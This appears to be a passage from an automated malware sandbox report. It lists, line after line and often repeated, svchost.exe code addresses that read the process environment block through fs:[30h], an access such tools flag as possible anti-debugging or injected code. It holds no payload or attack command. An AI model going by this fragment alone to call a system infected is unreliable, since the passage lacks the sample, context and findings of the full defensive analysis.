Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172 mov eax, dword ptr fs:[00000030h]	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C9179 mov eax, dword ptr fs:[00000030h]	1_2_036C9179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03705152 mov eax, dword ptr fs:[00000030h]	1_2_03705152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]	1_2_03629148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]	1_2_03629148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]	1_2_03629148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629148 mov eax, dword ptr fs:[00000030h]	1_2_03629148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C3140 mov eax, dword ptr fs:[00000030h]	1_2_036C3140
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C3140 mov eax, dword ptr fs:[00000030h]	1_2_036C3140
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C3140 mov eax, dword ptr fs:[00000030h]	1_2_036C3140
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03637152 mov eax, dword ptr fs:[00000030h]	1_2_03637152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362C156 mov eax, dword ptr fs:[00000030h]	1_2_0362C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C8158 mov eax, dword ptr fs:[00000030h]	1_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]	1_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]	1_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03660124 mov eax, dword ptr fs:[00000030h]	1_2_03660124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03631131 mov eax, dword ptr fs:[00000030h]	1_2_03631131
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03631131 mov eax, dword ptr fs:[00000030h]	1_2_03631131
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]	1_2_0362B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]	1_2_0362B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]	1_2_0362B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B136 mov eax, dword ptr fs:[00000030h]	1_2_0362B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118 mov ecx, dword ptr fs:[00000030h]	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F0115 mov eax, dword ptr fs:[00000030h]	1_2_036F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036551EF mov eax, dword ptr fs:[00000030h]	1_2_036551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036351ED mov eax, dword ptr fs:[00000030h]	1_2_036351ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D71F9 mov esi, dword ptr fs:[00000030h]	1_2_036D71F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037061E5 mov eax, dword ptr fs:[00000030h]	1_2_037061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036601F8 mov eax, dword ptr fs:[00000030h]	1_2_036601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]	1_2_036F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]	1_2_036F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366D1D0 mov eax, dword ptr fs:[00000030h]	1_2_0366D1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366D1D0 mov ecx, dword ptr fs:[00000030h]	1_2_0366D1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037051CB mov eax, dword ptr fs:[00000030h]	1_2_037051CB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]	1_2_036E11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]	1_2_036E11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]	1_2_036E11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E11A4 mov eax, dword ptr fs:[00000030h]	1_2_036E11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364B1B0 mov eax, dword ptr fs:[00000030h]	1_2_0364B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03670185 mov eax, dword ptr fs:[00000030h]	1_2_03670185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]	1_2_036EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]	1_2_036EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]	1_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]	1_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]	1_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]	1_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]	1_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]	1_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]	1_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03687190 mov eax, dword ptr fs:[00000030h]	1_2_03687190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B106E mov eax, dword ptr fs:[00000030h]	1_2_036B106E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03705060 mov eax, dword ptr fs:[00000030h]	1_2_03705060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov ecx, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03641070 mov eax, dword ptr fs:[00000030h]	1_2_03641070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365C073 mov eax, dword ptr fs:[00000030h]	1_2_0365C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AD070 mov ecx, dword ptr fs:[00000030h]	1_2_036AD070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03632050 mov eax, dword ptr fs:[00000030h]	1_2_03632050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D705E mov ebx, dword ptr fs:[00000030h]	1_2_036D705E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D705E mov eax, dword ptr fs:[00000030h]	1_2_036D705E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B052 mov eax, dword ptr fs:[00000030h]	1_2_0365B052
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B6050 mov eax, dword ptr fs:[00000030h]	1_2_036B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A020 mov eax, dword ptr fs:[00000030h]	1_2_0362A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362C020 mov eax, dword ptr fs:[00000030h]	1_2_0362C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]	1_2_036F903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]	1_2_036F903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]	1_2_036F903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F903E mov eax, dword ptr fs:[00000030h]	1_2_036F903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B4000 mov ecx, dword ptr fs:[00000030h]	1_2_036B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]	1_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]	1_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]	1_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]	1_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036550E4 mov eax, dword ptr fs:[00000030h]	1_2_036550E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036550E4 mov ecx, dword ptr fs:[00000030h]	1_2_036550E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0362A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036380E9 mov eax, dword ptr fs:[00000030h]	1_2_036380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B60E0 mov eax, dword ptr fs:[00000030h]	1_2_036B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0362C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036720F0 mov ecx, dword ptr fs:[00000030h]	1_2_036720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov ecx, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0 mov eax, dword ptr fs:[00000030h]	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037050D9 mov eax, dword ptr fs:[00000030h]	1_2_037050D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AD0C0 mov eax, dword ptr fs:[00000030h]	1_2_036AD0C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AD0C0 mov eax, dword ptr fs:[00000030h]	1_2_036AD0C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B20DE mov eax, dword ptr fs:[00000030h]	1_2_036B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036590DB mov eax, dword ptr fs:[00000030h]	1_2_036590DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C80A8 mov eax, dword ptr fs:[00000030h]	1_2_036C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F60B8 mov eax, dword ptr fs:[00000030h]	1_2_036F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_036F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363208A mov eax, dword ptr fs:[00000030h]	1_2_0363208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BD080 mov eax, dword ptr fs:[00000030h]	1_2_036BD080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BD080 mov eax, dword ptr fs:[00000030h]	1_2_036BD080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362D08D mov eax, dword ptr fs:[00000030h]	1_2_0362D08D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03635096 mov eax, dword ptr fs:[00000030h]	1_2_03635096
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365D090 mov eax, dword ptr fs:[00000030h]	1_2_0365D090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365D090 mov eax, dword ptr fs:[00000030h]	1_2_0365D090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366909C mov eax, dword ptr fs:[00000030h]	1_2_0366909C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]	1_2_0362B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]	1_2_0362B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]	1_2_0362B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362B765 mov eax, dword ptr fs:[00000030h]	1_2_0362B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03638770 mov eax, dword ptr fs:[00000030h]	1_2_03638770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03643740 mov eax, dword ptr fs:[00000030h]	1_2_03643740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03643740 mov eax, dword ptr fs:[00000030h]	1_2_03643740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03643740 mov eax, dword ptr fs:[00000030h]	1_2_03643740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366674D mov esi, dword ptr fs:[00000030h]	1_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]	1_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]	1_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630750 mov eax, dword ptr fs:[00000030h]	1_2_03630750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BE75D mov eax, dword ptr fs:[00000030h]	1_2_036BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]	1_2_03672750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]	1_2_03672750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03703749 mov eax, dword ptr fs:[00000030h]	1_2_03703749
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B4755 mov eax, dword ptr fs:[00000030h]	1_2_036B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EF72E mov eax, dword ptr fs:[00000030h]	1_2_036EF72E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03633720 mov eax, dword ptr fs:[00000030h]	1_2_03633720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364F720 mov eax, dword ptr fs:[00000030h]	1_2_0364F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364F720 mov eax, dword ptr fs:[00000030h]	1_2_0364F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364F720 mov eax, dword ptr fs:[00000030h]	1_2_0364F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F972B mov eax, dword ptr fs:[00000030h]	1_2_036F972B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]	1_2_0366C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]	1_2_0366C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]	1_2_0370B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]	1_2_0370B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]	1_2_0370B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370B73C mov eax, dword ptr fs:[00000030h]	1_2_0370B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629730 mov eax, dword ptr fs:[00000030h]	1_2_03629730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03629730 mov eax, dword ptr fs:[00000030h]	1_2_03629730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03665734 mov eax, dword ptr fs:[00000030h]	1_2_03665734
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363973A mov eax, dword ptr fs:[00000030h]	1_2_0363973A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363973A mov eax, dword ptr fs:[00000030h]	1_2_0363973A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]	1_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366273C mov ecx, dword ptr fs:[00000030h]	1_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]	1_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AC730 mov eax, dword ptr fs:[00000030h]	1_2_036AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03637703 mov eax, dword ptr fs:[00000030h]	1_2_03637703
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03635702 mov eax, dword ptr fs:[00000030h]	1_2_03635702
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03635702 mov eax, dword ptr fs:[00000030h]	1_2_03635702
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366C700 mov eax, dword ptr fs:[00000030h]	1_2_0366C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630710 mov eax, dword ptr fs:[00000030h]	1_2_03630710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03660710 mov eax, dword ptr fs:[00000030h]	1_2_03660710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366F71F mov eax, dword ptr fs:[00000030h]	1_2_0366F71F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366F71F mov eax, dword ptr fs:[00000030h]	1_2_0366F71F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363D7E0 mov ecx, dword ptr fs:[00000030h]	1_2_0363D7E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]	1_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]	1_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]	1_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_036BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]	1_2_036347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]	1_2_036347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036357C0 mov eax, dword ptr fs:[00000030h]	1_2_036357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036357C0 mov eax, dword ptr fs:[00000030h]	1_2_036357C0
